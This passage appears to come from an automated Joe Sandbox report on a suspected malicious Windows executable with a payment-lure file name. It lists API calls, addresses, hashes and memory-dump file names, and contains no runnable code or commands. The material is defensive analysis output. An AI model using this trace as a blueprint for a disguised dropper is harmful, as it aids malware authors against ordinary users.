                            • Instruction ID: 0bd1c2541dc6badd11bf791eeeb1c61969952e167bd25157246a8193e9c71b51
                            • Opcode Fuzzy Hash: 2e7e2aa4d72de09270b3b6845aff41f38ae00b54f46d65ff2e3fa17b0a003936
                            • Instruction Fuzzy Hash: C1E02632B00104EBCB14DFA8EDC086E73A5FB44310310483FE502B3290D6749C01CB68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                              • Part of subcall function 00406864: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040687B
                              • Part of subcall function 00406864: wsprintfW.USER32 ref: 004068B6
                              • Part of subcall function 00406864: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068CA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                            • String ID:
                            • API String ID: 2547128583-0
                            • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                            • Instruction ID: b54d22b37b479e59566a9631c032e51b8c6cd741f5ea0e4d018af200ac078f8b
                            • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                            • Instruction Fuzzy Hash: 48E086335042109AE21197715D44C7B73A8AF89650307443EF947F2080DB38DC31A669
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SendMessageW.USER32(?,0000000B,00000001), ref: 00402C14
                            • InvalidateRect.USER32(?), ref: 00402C24
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: InvalidateMessageRectSend
                            • String ID:
                            • API String ID: 909852535-0
                            • Opcode ID: d33419e91bae9b3dc09a0268fd640e139a72997e68fc10e20a1bd3dab651079b
                            • Instruction ID: 5d06d3db9ebdc20fb085111a80a7421945f3272c8e7f14f2d46d8925ba4bfc91
                            • Opcode Fuzzy Hash: d33419e91bae9b3dc09a0268fd640e139a72997e68fc10e20a1bd3dab651079b
                            • Instruction Fuzzy Hash: 0FE0EC72710508FFEB11CBA4EE85DAEB7B9FB44355F00057AF602A11A0D7754D51DA28
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: File$AttributesCreate
                            • String ID:
                            • API String ID: 415043291-0
                            • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                            • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                            • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                            • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetFileAttributesW.KERNELBASE(?,?,00405BD7,?,?,00000000,00405DAD,?,?,?,?), ref: 00405FD7
                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405FEB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: AttributesFile
                            • String ID:
                            • API String ID: 3188754299-0
                            • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction ID: 846b50f6ec280e5947384c74444241e6b9796591039fc91e932c01759f2cc32f
                            • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                            • Instruction Fuzzy Hash: 2CD0C972504531ABC2102728EE0889BBB55EF642717054A35FAA5A22B0CB304C529E98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateDirectoryW.KERNELBASE(?,00000000,004034EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00405ABB
                            • GetLastError.KERNEL32 ref: 00405AC9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CreateDirectoryErrorLast
                            • String ID:
                            • API String ID: 1375471231-0
                            • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                            • Instruction ID: 81e7360d8487983dd45b28c0c59a41c1d83062ba9acea414cf4290cf05fa9266
                            • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                            • Instruction Fuzzy Hash: C3C04C30314601AED7505B609E48B177EA19B94741F1A85396146E41A4DA389455DD2D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: FileMove
                            • String ID:
                            • API String ID: 3562171763-0
                            • Opcode ID: d6c66003e552b008329da1e20e4d2717e0cd9ee39e84ac84dc665d8d2f310599
                            • Instruction ID: 32516517407f25b6e59a0e341b25b3d6d0f9df0b9bc0d747a1158fd544962da6
                            • Opcode Fuzzy Hash: d6c66003e552b008329da1e20e4d2717e0cd9ee39e84ac84dc665d8d2f310599
                            • Instruction Fuzzy Hash: E3F09031A08120E6CB217BA69E4DE5E2154AF82378F24023FF012B21D1DABD891295AE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: PrivateProfileStringWrite
                            • String ID:
                            • API String ID: 390214022-0
                            • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                            • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                            • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                            • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: PathSearch
                            • String ID:
                            • API String ID: 2203818243-0
                            • Opcode ID: 0073700d60adfbe4143881f22dadb7b811daca8f4e16451e7651026b97bb0fbf
                            • Instruction ID: 54a96972ebf6e5f7d9af5d5faa48068549acc1a9791dfdba756491a3e909a95f
                            • Opcode Fuzzy Hash: 0073700d60adfbe4143881f22dadb7b811daca8f4e16451e7651026b97bb0fbf
                            • Instruction Fuzzy Hash: 06E0D872204100EBE740DB64DD48EAA3368DF40318B204236E101A50D1E6B48901932D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 004063CB
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                            • Instruction ID: 33fcb2899acb2d8a51dea3519172d90e3aaf79576ce2bf617fe5633813c3fc69
                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                            • Instruction Fuzzy Hash: 40E0BF72010109BEDF195F50ED0AD7B3A1DE704300F01452EB906D4051E6B5A9306664
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                            • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: FileWrite
                            • String ID:
                            • API String ID: 3934441357-0
                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                            • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402425
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: PrivateProfileString
                            • String ID:
                            • API String ID: 1096422788-0
                            • Opcode ID: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                            • Instruction ID: 209997e2e20356d43fdb77e3237b303e11e03b8f2c16ee2f2baf27e4b220ec87
                            • Opcode Fuzzy Hash: 7d71ac8ddd31db18f378b319f763d6172168bca54096192b0f97eaa7b6b6bd09
                            • Instruction Fuzzy Hash: 05E01A30C00229FADB10AFA0CD09EAD3668BF41340F14052AF510AA0D1E7F889409789
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,: Completed,?), ref: 00406398
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Open
                            • String ID:
                            • API String ID: 71445658-0
                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                            • Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                            • Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
